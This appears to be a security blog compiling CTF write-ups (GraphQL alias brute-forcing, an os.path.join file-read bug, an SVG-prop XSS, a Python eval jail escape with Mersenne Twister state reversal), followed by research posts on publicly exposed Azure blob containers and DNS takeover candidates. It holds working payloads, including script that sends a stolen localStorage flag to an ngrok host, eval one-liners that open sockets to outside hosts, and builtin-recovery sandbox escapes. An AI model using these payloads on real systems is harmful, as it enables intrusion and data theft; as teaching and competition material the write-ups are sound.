sent to the server, but GraphQL allows us to make more than 1 query in the same string. Since the app sends the whole body to the graphql engine, we can take advantage of it!
Let’s make a test:
query Abc { flag(pin: 1234) }
query Def { flag(pin: 1235) }
But it complains:
{
"errors": [
{
"message": "Must provide operation name if query contains multiple operations."
}
],
"data": null
}
That’s where we took some time to solve it. We where trying to send mutiple queries using the JSON with operationName
and the query
, like this:
{
"query": "query Abc { flag(pin: 1) }",
"operationName": "Flag1"
}
We got nowhere like these. While overcomplicating this, we found some interesting things that may or may not get us a future article.
Since we saw a lot of solves, we knew that there must be a simpler path and we were just missing the right syntax. Alisson came out to rescue with the simpler format I hadn’t seen for this:
query GetFlag {
f1: flag(pin: 1)
f2: flag(pin: 2)
}
And we finally got what we wanted: multiple queries and multiple answers in the same request, which bypass the rate-limit, allowing the brute-force.
{
"data": {
"f1": "Wrong!",
"f2": "Wrong!"
}
}
In a GraphQL perspective, we could, in theory, send only 1 request with all 100k queries, but the request get’s too big. We tested and decided for a 10k queries/request, which fit inside the rate-limit for solving in 1 minute or less, because it’s a maximum of 10 requests.
This is a “beautified” version of the exploit we used in the CTF, for beautifying purposes.
import requests
headers = {
'Content-Type': 'text/plain;charset=UTF-8',
}
for i in range(10):
MAX_NUM = 10000 # Max Request Size
INI = (i*MAX_NUM)+MAX_NUM
print(f'=========> Brute Range: {INI} - {INI+MAX_NUM-1}')
QUERIES = '\n'.join([f'f{x}: flag(pin: {x})' for x in range(INI,INI+MAX_NUM)])
OPERATION = 'query Getflag { ' + QUERIES +' }'
response = requests.post('https://web-force-force-384c2b201a1a2244.be.ax/', headers=headers, data=OPERATION)
result = response.text.replace(',', ',\n')
print(f'Status: {response.status_code}')
FLAG_PREFIX = 'corctf{'
index = result.find(FLAG_PREFIX)
if index > 0:
flag_ini = index
flag_end = result.index('}', index+len(FLAG_PREFIX)) + 1
flag = result[index:flag_end]
print(f'Flag is {flag}')
break
else:
print('Not yet!')
print()
python exploit2.py
=========> Brute Range: 10000 - 19999
Status: 200
Not yet!
=========> Brute Range: 20000 - 29999
Status: 200
Not yet!
=========> Brute Range: 30000 - 39999
Status: 200
Not yet!
=========> Brute Range: 40000 - 49999
Status: 200
Not yet!
=========> Brute Range: 50000 - 59999
Status: 200
Not yet!
=========> Brute Range: 60000 - 69999
Status: 200
Flag is corctf{S T O N K S}
corctf{S T O N K S}
This challenge gives you an upload page that “anonymizes” an image.
After uploading an image:
(OK, now he’s protected)
OK, I could make a complete analysis of the challenge, but after reading some code, we got to the visualization route:
@app.route('/anonymized/<image_file>')
def serve_image(image_file):
file_path = os.path.join(UPLOAD_FOLDER, unquote(image_file))
if ".." in file_path or not os.path.exists(file_path):
return f"Image {file_path} cannot be found.", 404
return send_file(file_path, mimetype='image/png')
Since it downloads a local file path given by the image_file
parameter, we think of an LFI immediately.
There is a filter for ..
, to avoid a path traversal, like ../../../flag.txt
. We can’t use the most basic LFI.
It turns out that os.path.join
has an almost backdoor-like behaviour of ignoring the first parameter if the last is an absolute path.
>>> import os
>>>
>>> os.path.join('/uploads', 'file1.png')
'/uploads/file1.png'
>>>
>>> os.path.join('/uploads', '/file1.png')
'/file1.png'
Why? I don´t know. I have to read more about it on the spec documents.
But knowing this, and also that the flag is in the file /flag.txt
, we can just think of this.
>>> os.path.join('/uploads', '/flag.txt')
'/flag.txt'
Also note that it calls an unquote
in the image_file
path parameter.
Let’s try calling it directly, just for fun.
curl --path-as-is https://msfrognymize.be.ax/anonymized//flag.txt
<!doctype html>
<html lang=en>
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to the target URL: <a href="http://msfrognymize.be.ax/anonymized/flag.txt">http://msfrognymize.be.ax/anonymized/flag.txt</a>. If not, click the link.
It’s fixing the path and and redirecting… not good. Let’s try URL Encoded.
> encodeURIComponent('/flag.txt')
'%2Fflag.txt'
>
Go again
curl --path-as-is https://msfrognymize.be.ax/anonymized/%2Fflag.txt
<!doctype html>
<html lang=en>
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to the target URL: <a href="http://msfrognymize.be.ax/anonymized/flag.txt">http://msfrognymize.be.ax/anonymized/flag.txt</a>. If not, click the link.
Same boring result. Since it’s unquoting on the server side (beyond basic HTTP transfer), let’s double-quote it:
> encodeURIComponent(encodeURIComponent('/flag.txt'))
'%252Fflag.txt'
curl --path-as-is https://msfrognymize.be.ax/anonymized/%252Fflag.txt
corctf{Fr0m_Priv4cy_t0_LFI}
After registration, you a see 4 (frog) cards owned by admin
and a plus sign, which is a button to add a new card owned by your user.
On the new card screen, you have some simple options, including an SVG URL for your frog.
SVG URL…
It’s a Node/NextJS App. There is a lot of code in various files here, so I won’t go into detail in all of them.
First of all, let’s check where the flag will be available.
export default {
flag: "corctf{t3st_fl4g}",
password: "adminadmin"
};
import secrets from './secrets';
const username = "admin";
const { flag, password } = secrets;
export default {
id: 'frogshare',
name: 'frogshare',
timeout: 20000,
handler: async (url, ctx) => {
const page = await ctx.newPage();
await page.goto("https://frogshare.be.ax/login", { waitUntil: 'load' });
await page.evaluate((flag) => {
localStorage.setItem("flag", flag);
}, flag);
await page.type("input[name=username]", username);
await page.type("input[name=password]", password);
await Promise.all([
page.waitForNavigation(),
page.click("input[type=submit]")
]);
/* No idea why the f this is required :| */
await page.goto("https://frogshare.be.ax/frogs?wtf=nextjs", { timeout: 5000, waitUntil: 'networkidle0' });
await page.waitForTimeout(2000);
await page.goto(url, { timeout: 5000, waitUntil: 'networkidle0' });
await page.waitForTimeout(5000);
},
}
For those unfamiliar with XSS challenges, you usually have an admin bot, that simulates a real user with admin privileges, logs in in the same system you’re trying to hack and navigate to some URL you provide.
admin
and the secret password (not the same of our provided source code, of course).https://frogshare.be.ax/frogs?wtf=nextjs
So, the objetive here is to leak the Flag from the Admin Browser localStorage. The 5 seconds are basically the time our XSS has to leak the info.
At the begining of the challenge, an NPM package called my attention, which is being used in Frog.js: external-svg-loader
.
https://github.com/shubhamjain/svg-loader
SVG Loader is a simple JS library that fetches SVGs using XHR and injects the SVG code in the tag's place. This lets you use externally stored SVGs (e.g, on CDN) just like inline SVGs.
There is something here. This library injects external SVGs (cross-domain) in the local (target) DOM. SVGs can contain JavaScript. In the case of this app, since we provide the SVG, we can also inject it’s JavaScript, in theory.
The documentation shows that there is a protection on it:
2. Enable Javascript
SVG format supports scripting. However, for security reasons, svg-loader will strip all JS code before injecting the SVG file. You can enable it by:
<svg
data-src="https://unpkg.com/@mdi/svg@5.9.55/svg/heart.svg"
data-js="enabled"
onclick="alert('clicked')"
width="50"
height="50"
fill="red"></svg>
It only loads JavaScript when data-js
attribute is enable
, which is not there, by looking at the tag in Frog.js.
<svg data-src={img} {...svgProps} />
BUT, svgProps
comes from the frog object, which comes from the user payload:
const svgProps = useMemo(() => {
try {
return JSON.parse(frog.svgProps);
} catch {
return null;
}
}, [frog.svgProps]);
It puts all the attributes sent by the user on the svg object.
Let’s look at a sample JSON request for it, while submitting the frog info.
{
"name": "NepFrog",
"url": "https://ctf.cor.team/2023-ctf/frogs/pepega-frog.svg",
"svgProps": {
"height": 100,
"width": 100
}
}
Let’s see the happy-path result:
<svg
data-src="https://ctf.cor.team/2023-ctf/frogs/pepega-frog.svg"
height="100"
width="100"
version="1.1"
id="Layer_1"
xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink"
viewBox="0 0 512.003 512.003"
xml:space="preserve"
data-id="svg-loader_44">
Note that our parameters height
and width
turned into HTML attributes for the svg object.
Now we have information for an action plan:
data-js
attribute on the svg tag (controlled by the external-svg-loader
).Let’s try injecting the data-js
parameter on the svg.
payload.json
{
"name": "NepFrog",
"url": "https://ctf.cor.team/2023-ctf/frogs/pepega-frog.svg",
"svgProps": {
"height": 100,
"width": 100,
"data-js": "enabled"
}
}
inject-payload.sh
curl 'https://frogshare.be.ax/api/frogs?id=81' \
-X 'PATCH' \
-H 'Accept: application/json, text/plain, */*' \
-H 'Content-Type: application/json' \
-H 'Cookie: session=2bbfe567ecf3c637ea12379ae3cc160a96e2fa84530c821b8e0f42e7cc7293ac' \
-d @payload.json
{"msg":"Frog updated successfully"}
After reloading, our injected attribute is there.
<svg
data-src="https://ctf.cor.team/2023-ctf/frogs/pepega-frog.svg"
height="100" width="100"
data-js="enabled"
version="1.1" id="Layer_1"
xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink"
viewBox="0 0 512.003 512.003"
xml:space="preserve"
data-id="svg-loader_1">
We just bypassed the javascript filter.
We now need to serve the rogue SVG from our controlled-server. Since external-svg-loader
relies or CORS for fetching, I created an app with my own hands for this.
“I” came out with the source below:
from flask import Flask, send_file, request
from flask_cors import CORS
app = Flask(__name__)
CORS(app) # Habilita CORS para a aplicação Flask
# Server the evil svg
@app.route('/svg')
def serve_svg():
svg_file_path = 'evil.svg'
return send_file(svg_file_path, mimetype='image/svg+xml')
# Route to receive the flag
@app.route('/flag')
def flag_route():
data = request.args.get('data', '')
return data
if __name__ == '__main__':
app.run()
The last piece is the evil SVG itself, served through ngrok, which points to my running local webapp.
We can use a very simple JavaScript to get the localStorage info and send it back to our server. Logging to the console only to simplify local tests.
console.log("Hello!");
fetch("https://ngrok-url/flag?data=" +
encodeURIComponent(localStorage.getItem("flag")),
{"mode": "no-cors"})
.then(() => console.log("Sent!"));
That goes in our SVG:
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 500 500">
<script>//<![CDATA[
console.log("Hello!");
fetch("https://0000-000-00-000-00.ngrok-free.app/flag?data=" + encodeURIComponent(localStorage.getItem("flag")), {"mode": "no-cors"}).then(() => console.log("Sent!"));
//]]>
</script>
</svg>
Let’s test the payload in the App, with our user. For fun, let’s put a fake flag in the localStorage of our browser in the frogshare app domain.
Let’s Frog it:
{
"name": "NepFrog",
"url": "https://fd5f-201-17-122-29.ngrok-free.app/svg",
"svgProps": {
"height": 100,
"width": 100,
"data-js": "enabled"
}
}
Looks like something is on its way
Ngrok validates our test
Hack is in place. Fire in the (AdminBot) Hole!
corctf{M1nd_Th3_Pr0p_spR34d1ng_XSS_ThR34t}
Being one of the most widely used storage services on the web - probably only falling behind to AWS’s storage services - Azure storage accounts provide a simple and effective way of storing many kinds of data in the cloud. It allows you to store your data in blob containers, file shares, tables or queues without having to worry about scalability, durability and availability. In less than 5 minutes you can set up an storage account under your subscription and upload your data into the cloud. After that you can use all sorts of cloud services on top of your data, develop data analysis pipelines, automated notifications, or just host static websites.
The simplest type of storage service you can use is object storage: services that allow you to store any kind of file in them and access the file by its name, usually providing an URL for your file under the cloud’s domain. One of such services is Azure blob storage, a service from Azure storage accounts. Azure blob storage works similarly to S3 buckets - you create a storage account, then in that account you create a Container for your files, choose the appropriate Public access level for your container and upload your files into it.
Azure enables public access to blobs by default when you create a storage account:
Then, when you decide to use Azure blob storage, this is the page you will be looking at:
When you’re creating the container for your objects, you choose one of these Public access levels:
Azure pre-selects Private for you and then warns against using Container as the access level for your container - but many ignore it:
The issue with the Container public access level is that, although an attacker will not be able enumerate the containers in the root of the storage account, it’s a bit obvious that most organizations will tend to use a small set of common names for their containers, like images, videos or logs. An attacker can easily just try a small wordlist like this on the public endpoint of the blob storage service, since there doesn’t seem to be any sort of rate limiting in Azure that prevents this sort of behavior.
I decided to take a look at this issue to understand how big the problem is, so I developed a fast scanning tool, goblob, to enumerate exposed blob containers in Azure storage accounts. A friend pointed out to me that SpongeBlob would be much funnier, but then it was too late and I had already chosen a name 🫤.
The idea is that, if you get an HTTP 200 accessing the container endpoint:
https://<storageaccount>.blob.core.windows.net/<containername>?restype=container
Then it means that the specified container exists under that storage account and that it’s publicly exposed with an access level of Container. Then you can append &comp=list
to the URL to get a pretty XML listing all blobs under that container.
To perform this analysis I’d need more than just that, though - I needed a sample of existing storage account names, and then a wordlist of possible container names under these storage accounts.
For the issue of finding storage account names, I decided to find subdomains of Azure storage services, since they always include the name of the storage account. I used a combined approach - first I used my NameScraper tool to scrape SecurityTrails’ public data for subdomains of blob.core.windows.net
, table.core.windows.net
, queue.core.windows.net
and file.core.windows.net
. Then I used amass
to gather more subdomains of these domains from miscellaneous OSINT sources. For the wordlist, I adapted an existing open-source wordlist of bucket names into a 2087-word wordlist of possible container names.
The full plan was as follows:
This approach yielded a list of 39.731 possible storage account names to check against 2.087 container names - a search space of almost 83 million container URLs. I checked them with goblob to find the URLs of the first 20 pages of blobs in each container:
$ ./goblob -accounts=storage-accounts.txt -containers=wordlists/goblob-folder-names.txt -maxpages=20 -output=blobs.txt -blobs=true
Obviously this took some hours to run, but by the time it finished I had a list of URLs for 19.630.450 exposed blobs. These blobs amounted for a total of 55 TB of data. The public containers were found across 1.272 storage accounts (3.2% of my sample) using a total of 516 distinct container names (~1/4 of my wordlist). Here is a wordcloud of the exposed container names found:
An even harder problem is to figure out which of these URLs contain sensitive information, as most people won’t have 55 TB of storage hanging around to download and analyze the full data. I didn’t download this data for obvious reasons, but I did analyze their URLs and file extensions briefly. Here are the main highlights that I found interesting (and worrisome!):
The simplest mitigation for this sort of issue is to have an up-to-date inventory of your storage account containers and make sure all containers containing sensitive information have an access level of Private. In some cases it might be okay to use an access level of Blob on your container, such as when the only files you intend to store there have a sufficiently random identifier in the name, like a GUID, but the Container access level should be avoided whenever possible.
If you have a scenario where you can’t use the Private access level because you have an external partner that needs access to your data, the preferred method for doing that is by using a Shared Access Signature to create temporary credentials that can be used by the partner for specific actions inside your storage account. You can even configure a set of IPs which should be allowed to use your SAS:
You can also restrict or disable public network access in the Networking tab:
If your partner is processing data from your blob storage using applications in their Azure tenant, they can even set up a private endpoint to access your storage account directly through Azure’s network, without the need to traverse the public internet.
Another action that could be taken is to implement rules to detect the usage of this sort of technique. Last month Microsoft published a great article on this subject, detailing how they implemented 8 key detection rules in Defender for Storage to help identify possible attempts to compromise exposed blobs. They also shared Sentinel queries in KQL that can be used to detect this kind of scenario. Check it out if you want to know more:
MS Tech Community - Protect your storage resources against blob-hunting
I hope you enjoyed the reading and learned a good example of how small mistakes can lead to great damages. This whole analysis was done with no specific target in mind, using basic cloud knowledge, a standard laptop, public resources and some patience. Motivated attackers with enough resources have probably already automated this sort of process and some may have the ability to find your company’s secrets in the blink of an eye. Remember to keep your containers private and your blobs safe :-)
In case you liked this article, here are some additional resources to read on the topic of Azure blob storage:
]]>UTCTF is maintained by the Information & Systems Security Society at the University of Texas at Austin.
Since I’m not a Python Jail Houdini like Alisson, my solution was WAY, WAY harder than most (or all) teams. But since it was an unintended solution and I learnt a lot in the process, it was worth it.
Yes, 77 solves, but since it’s a fun different path, it deserves the writeup.
The challenge is a number guessing game, where the right guess give you the password for the next level. The range of possible numbers is big, so you won’t really make the right guess (or maybe you’re a prophet, who knows?).
It’s a simple form with a post to the server, no javascript involved. The guessing process is all done on the server side and the challenge is blind, without the server source-code.
<form method="post" action="#level-0">
<input type="text" name="expression" />
<input type="submit" value="Run" />
<input type="hidden" name="type" value="calculate" />
<input type="hidden" name="level" value="0" />
</form>
It says It'll even do math for you!
. Let’s try it.
It works! It EVALuates the expression (spoiler-alert).
Now let’s touch the app with the evil hand, trying to force an exception with a possibly wrong expression.
Gotcha!
result = eval(answer)
Since we can just send a string to eval
, the RCE is just automatic.
Let’s try getting the source-code (we know the file name by the previous exception):
open('./problem.py').read()
And we get problem.py.
import random
password = open("password.txt").read()
solution = random.getrandbits(32)
answer = input()
result = eval(answer)
if result == solution:
print(f"{result}, correct! The password is '{password}'.")
else:
print(f"Result: {result}. The correct answer was {solution}.")
There is a password to unlock the next level, let’s try getting the password file.
open("password.txt").read()
And..
Result: PuXqj7n4WNZzStnWbtPv. The correct answer was 4045986092.
Let’s try it:
That was easy. Bring more.
Let’s start trying the same.
open('./problem.py').read()
Not that good result.
Traceback (most recent call last):
File "problem.py", line 7, in <module>
result = eval(answer, {"open": None})
File "<string>", line 1, in <module>
TypeError: 'NoneType' object is not callable
It blocked the open
function. Can’t directly open the source or the password file… can’t we?
Let’s try a shell RCE. Since we can’t do multiline statements - like import os
and os.system("cmd")
- in the eval
call, we can import using a builtin function and then call it.
__import__("os").system("cat password.txt")
Krdi9yQuY8mHoteZDCF5Result: 0. The correct answer was 1615348051.
Let’s try to check-in to the next level with it.
Unlocked level 2
Next!
Let’s start with the previous payload.
cat: password.txt: No such file or directory
OK, we still have the RCE with the same payload, but there is no password file. Let’s check the source code of level 2.
__import__("os").system("cat problem.py")
Resulting in problem2.py:
import random, os
password = open("password.txt").read()
os.remove("password.txt") # No more reading the file!
solution = random.getrandbits(32)
answer = input()
result = eval(answer, {})
if result == solution:
print(f"{result}, correct! The password is '{password}'.")
else:
print(f"Result: {result}. The correct answer was {solution}.")
Now we are a little bit more restricted in the eval, but we have a bigger problem: the password file is just being deleted!
The information is in the password
variable, but there is no file to read it.
We have (possibly) two options to get the correct result here:
Since we can’t access the caller variables from the eval scope (more on that later!), I went to the second option, which is the unintended solution :S
I knew it is possible to predict the next random values in some scenarios, but getting previous random values is a different species.
The algorithm for the random
module in Python is called Mersenne Twister
, with is a pseudorandom number generator (PRNG), but it is not a Cryptographically Secure PRNG.
While searching for this, I came up with this EXCELENT series of articles on cracking random values, by this beast crypto-hacker called James Roper.
It turns out, the Mersenne Twister
is based on a state, formed by 614 32-bit numbers. The random
module allows you to get the current state. Let’s try it:
import random
random.getrandbits(32)
1273474650
random.getstate()
(3, (2494642692, 1550483902, 881532875, ..., 705994986, 3574982157, 1), None)
The function returns a tuple with 3 values and the middle value is the state. It also has a number in the end - 1
in this case. I didn’t learn what this number means, but it was either 1
or 614
. That is enough.
Let’s check if we can get the server state.
__import__('random').getstate()
OK, I’m convinced.
The article have an algorithm that, in theory, can reverse the random state to the previous one. If we can calculate the previous state and set it again - using random.setstate()
- we can generate the same random value again!
Let’s translate the article algorithm to Python and make a PoC:
import random
# Get the state before the random
_, first_state, _ = random.getstate()
# Get the solution random value
solution = random.getrandbits(32)
# Get the state after the random
first, current_state, last = random.getstate()
# Turn the state into a list, to work on it
new_state = list(current_state)
# Last was the constant number (1 or 624)
new_state[-1] = 624
# https://jazzy.id.au/2010/09/25/cracking_random_number_generators_part_4.html
for i in reversed(range(624)):
result = 0
tmp = new_state[i]
tmp = tmp ^ new_state[(i + 397) % 624]
if ((tmp & 0x80000000) == 0x80000000):
tmp = tmp ^ 0x9908b0df
result = (tmp << 1) & 0x80000000
tmp = new_state[(i - 1 + 624) % 624]
tmp = tmp ^ new_state[(i + 396) % 624]
if ((tmp & 0x80000000) == 0x80000000):
tmp = tmp ^ 0x9908b0df
result = result | 1
result = result | ( (tmp << 1) & 0x7fffffff )
new_state[i] = result
# First value is always a constant
# Binary 10000000000000000000000000000000
new_state[i] = 2147483648
# Compare the states
print(new_state == list(first_state))
complete_target_state = (3, tuple(new_state), None)
random.setstate(complete_target_state)
cracked_solution = random.getrandbits(32)
print(f'Solution : {solution}')
print(f'Cracked Solution: {cracked_solution}')
Resulting in poc_crack_rand.py:
True
Solution : 1920796803
Cracked Solution: 1920796803
It works! All the crypto-credits to James Roper. I just used his algorithm.
But now we need to to this in our VERY LIMITED eval
command. it is probably possible, but I tought it would be easier to send the state to a server controlled by me, to calculate the answer remotely and just send the result back.
If the result of the eval is the same “random” number, it will display the password.
Remember:
# ...
solution = random.getrandbits(32)
# ...
result = eval(answer, {})
if result == solution:
print(f"{result}, correct! The password is '{password}'.")
# ...
Socket operations are multiline, which seems like a limit in our eval
, but we can just call different commands and simulate local variables with a list comprehension.
Let’s spawn an ngrok session with a netcat backend to try receiving the server random state.
nc -lnvp 7777
Listening on 0.0.0.0 7777
Send some random payload through the socket.
[[x.connect(('2.tcp.ngrok.io', 19801)), x.send(b'a'*100), x.close()] for x in [__import__('socket').socket()]]
And our netcat receives a knock in the door:
Connection received on 127.0.0.1 34756
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
OK, let’s do it again, but with the random state of the server:
[[x.connect(('0.tcp.ngrok.io', 12851)), x.send(bytes(str(__import__('random').getstate()), 'UTF-8')), x.recv(20)] for x in [__import__('socket').socket()]]
which pings our netcat:
Connection received on 127.0.0.1 58092
(3, (3124877765, 267264362, 3570554370, 1064243459, 1732759887, 1732358228, 2719541217, 2504092942, 1438060417, 3270814677, 1986441919, 2698534769, 344725754, 3904667424, 2469278522, ...
OK, now we can crack the state and just send the correct guess back to our eval RCE.
Run the Cracking Server, a socket app to receive the state and crack it:
import random
import socket
def str_to_state(state_str):
return eval(state_str, {})
# https://jazzy.id.au/2010/09/25/cracking_random_number_generators_part_4.html
def get_last_state(current_state):
new_state = list(current_state)
new_state[-1] = 624
for i in reversed(range(624)):
result = 0
tmp = new_state[i]
tmp = tmp ^ new_state[(i + 397) % 624]
if ((tmp & 0x80000000) == 0x80000000):
tmp = tmp ^ 0x9908b0df
result = (tmp << 1) & 0x80000000
tmp = new_state[(i - 1 + 624) % 624]
tmp = tmp ^ new_state[(i + 396) % 624]
if ((tmp & 0x80000000) == 0x80000000):
tmp = tmp ^ 0x9908b0df
result = result | 1
result = result | ( (tmp << 1) & 0x7fffffff )
new_state[i] = result
new_state[i] = 2147483648 # constant
return new_state
def reverse_random_state(current_state_str):
_, current_state, _ = str_to_state(current_state_str)
last_state = get_last_state(current_state)
complete_target_state = (3, tuple(last_state), None)
random.setstate(complete_target_state)
# https://www.digitalocean.com/community/tutorials/python-socket-programming-server-client
def server_program():
remote_random_state = ''
# get the hostname
host = '0.0.0.0' #socket.gethostname()
port = 7777 # initiate port no above 1024
server_socket = socket.socket() # get instance
# look closely. The bind() function takes tuple as argument
server_socket.bind((host, port)) # bind host address and port together
# configure how many client the server can listen simultaneously
server_socket.listen(2)
conn, address = server_socket.accept() # accept new connection
print("Connection from: " + str(address))
while True:
# receive data stream. it won't accept data packet greater than 1024 bytes
data = conn.recv(1024 * 100).decode()
print("from connected user: " + str(data))
print("\n"*5)
if not data:
# if data is not received break
break
remote_random_state += str(data).strip()
if remote_random_state.find('), None)') >= 0:
reverse_random_state(remote_random_state)
answer = str(random.getrandbits(32))
# send cracked random to the client
conn.send(answer.encode())
break
conn.close() # close the connection
server_socket.close()
if __name__ == '__main__':
server_program()
In the eval payload, we have to also process the response from the random, to make it an int:
int([[x.connect(('8.tcp.ngrok.io', 15754)), x.send(bytes(str(__import__('random').getstate()), 'UTF-8')), x.recv(20), x.close()] for x in [__import__('socket').socket()]][0][2])
And, let’s run our Exploit to make the attack easier.
And we finally receive the prize:
1364310140, correct! The password is 'E46Dnqb5enAMgGArbruu'
Password: E46Dnqb5enAMgGArbruu
Let’s just try the same payload, off-course.
Now it also blocks our built-in functions, like int
and __import__
.
It is now like a standard SSTI challenge. We can get the classes and builtins we need from the primitive types, like tuple
and str
.
Let’s check our available classes on the server:
().__class__.__base__.__subclasses__()
A lot of stuff. The interesting class here is the warnings.catch_warnings
. It allows us to get to the builtins.
Let’s try a simple RCE.
{x.__name__: x for x in ().__class__.__base__.__subclasses__()}['catch_warnings']()._module.__builtins__['int']("12")
And…
Result: 12. The correct answer was 2743938107.
OK, we’re in again.
Let’s adapt our payload from level 2 to the new world order.
{x.__name__: x for x in ().__class__.__base__.__subclasses__()}['catch_warnings']()._module.__builtins__['int']([[x.connect(('2.tcp.ngrok.io', 10157)), x.send({x.__name__: x for x in ().__class__.__base__.__subclasses__()}['catch_warnings']()._module.__builtins__['bytes']({x.__name__: x for x in ().__class__.__base__.__subclasses__()}['catch_warnings']()._module.__builtins__['str']({x.__name__: x for x in ().__class__.__base__.__subclasses__()}['catch_warnings']()._module.__builtins__['__import__']('random').getstate()), 'UTF-8')), x.recv(20)] for x in [{x.__name__: x for x in ().__class__.__base__.__subclasses__()}['catch_warnings']()._module.__builtins__['__import__']('socket').socket()]][0][2])
(It could be more readable, by making the builtins into a string variable here but… feel the vibe!)
utflag{LGvb7PJXG5JDwhsEW7xp}
After my Around the World in 80 days solution, the CTF ended and I went too see the other solutions. There were 70 solves! I obviously didn’t see the simpler solutions.
bawolff#3779
sent that:
[x for x in ().__class__.__base__.__subclasses__() if x.__name__ == "catch_warnings"][0]()._module.sys._getframe(1).f_locals["password"]
That’s it. sys._getframe(1).f_locals
to get local variables from the caller (dumb me)
.
And there was another, even simpler, approach, from bliutech#7756
.
__import__('__main__').password
(dumb me)^2
But it was so fun…
If you need to evaluate code from the client, is hard to guarantee safety. Python might not be the best choice. Maybe JavaScript? Can you do it without running client-controlled code on the server?
If you really need it, you should look for safer, sandboxed solutions.
I’m sure I’m forgetting other important protections here. Send me hints for better security on Twitter.
This article describes an experiment aimed at finding domains likely vulnerable to DNS takeover, a well-known technique that can be used to steal decomissioned, but active domains. In this experiment I will show how I was able to find with little effort more than 200 domains that could be theoretically taken over across different providers and parent domains by using data from a public search tool (SecurityTrails) and an open-source repository (can-i-take-over-dns).
Please note that I did not find any new vulnerabilities nor develop any sort of attack tools or techniques during this research. I just analyzed what was already there, not being responsible in any way for whatever damages could be caused by the usage of the methods described below.
A Subdomain takeover is a vulnerability that happens when there is a CNAME record pointing a domain app.site.com
to a domain name.b.com
, in which domain b.com
belongs to a third-party platform that allows their customers to choose subdomains of their b.com
zone for usage with their services.
For example, let’s imagine we are the current owners of site.com
working with a provider named host.net
. We decide to use a managed application service from host.net
named service
to host our app myapp
. After configuring the service in host.net
, it gives us a subdomain in their service.host.net
zone hosting our app - let’s say myapp.service.host.net
. We’d like to access our app through our domain, not theirs, so we create a CNAME in the site.com
zone pointing app.site.com
to myapp.service.host.net
.
Later on we decide to remove our app from host.net
, releasing the domain name in their zone. If we don’t remember to remove the CNAME (we won’t), another customer of host.net
can come in and set up their own app named myapp
in the managed app service. They would be able to host any content they wanted under our app.site.com
subdomain, effectively taking over it.
A DNS takeover is a similar vulnerability, but instead of allowing an attacker to hijack the contents that users see when they access one of your subdomains, it allows attackers to gain control over an entire zone, being able to create any records they want to. It happens when an entity registers a domain in their registrar, delegates administration of the domain to another more convenient provider, and in the future deletes the domain in that provider. Since the delegation is still in the registrar, an attacker can create an account in the provider and recreate the domain.
For example, suppose we are a loyal customer of the cloud.net
provider. We just bought bigcorp.com
for the next year from GoDaddy (our preferred registrar), but we actually want to manage the bigcorp.com
zone using our cloud.net
provider and not GoDaddy. Next we would have to create a zone for site.com
in our cloud.net
provider, and then access GoDaddy and create an NS
record delegating the bigcorp.com
site to the nameservers of cloud.net
, which could be ns1.cloud.net
and ns2.cloud.net
.
Suppose we get tired of bigcorp.com
and decide to use bigcorp.io
instead. We would keep paying for bigcorp.com
for the following years, since we don’t want to lose the name. Then at some point someone would remove the bigcorp.com
zone from the cloud.net
portal, thinking it has no business being there if it’s not in use, thus creating what is called a lame delegation - when a domain points to nameservers that don’t actually respond authoritatively to queries for that domain. If an attacker realizes that bigcorp.com
has a lame delegation to cloud.net
nameservers, this person could create an account in our provider and recreate bigcorp.com
, being able to create all sorts of records there. For instance, they would be able to create subdomains of bigcorp.com
for phishing purposes, or create an MX
record to intercept all emails directed to bigcorp.com
.
In case you want to learn more before going further, Patrik Hudak’s blog has some pretty good educational articles describing these attacks, including other ways to find candidates for takeover with subdomain enumeration techniques, and how to develop other attacks after a subdomain takeover is exploited.
I wanted to know what could be done to better understand, and possibly help mitigate risks of DNS takeovers in the internet. Of course it’s an unreasonable goal, but one can dream, right? The first question that I wanted to answer was whether we could come up with a simple and effective way to find domains that were likely vulnerable to DNS takeover.
The problem is that no one really knows which records exist in a registrar apart from the registrar itself, since it owns the zonefiles. One could find a huge list of random domains somewhere and scan them for possible DNS takeover scenarios, but this is too time-consuming and in most cases unlikely to yield good results. To find possible scenarios we need a way to dump a list of domains that delegate their zones to nameservers of vulnerable providers.
At this point I was just thinking, but then I was casually talking to my friend Kali Nathalie about pentesting the other day, and she mentioned that SecurityTrails had a subdomain search tool with a pretty good database, so I browsed to it and found that, not only does it have a great database, but it also provides reverse NS and reverse CNAME lookups, our missing piece of the puzzle. That’s something you don’t find very often, since the DNS protocol does not specify these sorts of lookups - there’s no reason why it should, really.
Now the plan was:
First I extracted all nameservers of the vulnerable providers from indianajson’s can-i-take-over-dns repository. His repository currently documents the state of 28 providers regarding DNS takeover, 19 of which are currently listed as “Vulnerable” or “Edge Case”. Besides the “Not Vulnerable” nameservers, all CloudFlare nameservers were ignored for this step, since a successful attack is unlikely due to their high number of nameservers.
I had a list of 379 nameservers from 18 providers to search:
Provider | # of nameservers evaluated |
---|---|
Azure | 228 |
NS1 | 72 |
Google Cloud | 28 |
DNSMadeEasy | 7 |
Hurricane Electric | 5 |
DNSimple | 4 |
Dotster | 4 |
EasyDNS | 4 |
000Domains | 4 |
Bizland | 4 |
Name.com | 4 |
Digital Ocean | 3 |
Domain.com | 2 |
TierraNet | 2 |
Reg.ru | 2 |
Yahoo Small Business | 2 |
Linode | 2 |
MyDomain | 2 |
For the top 3 providers in the table I just guessed their nameservers by trial and error since they weren’t explicited in indianajson’s repository, so the real number could be more or less than what I found.
Also note that, in most cases, many nameservers in the same provider will serve records from the same zonefiles, some acting as backups in case others fail. That should not stop us from analyzing them though, since some domains might not appear in the database as being associated with all nameservers of their provider. As long as we have the time to do so, the chances are we will be getting more domains this way.
I decided to try one of the Azure nameservers manually, going through the pages in SecurityTrails and dumping the domains from the search results table with Javascript:
var my_rows = document.querySelectorAll("tbody>tr a")
var my_domains = []
my_rows.forEach((row) => {
row.childNodes.forEach(
(link) => {
my_domains.push(link.textContent)
}
)
})
console.log(my_domains.join("\n"))
In the first nameserver I tried I found 3728 domains pointing to it. Then I ran dig
over all 3728 domains to see whether any of them returned a SERVFAIL
or a REFUSED
error:
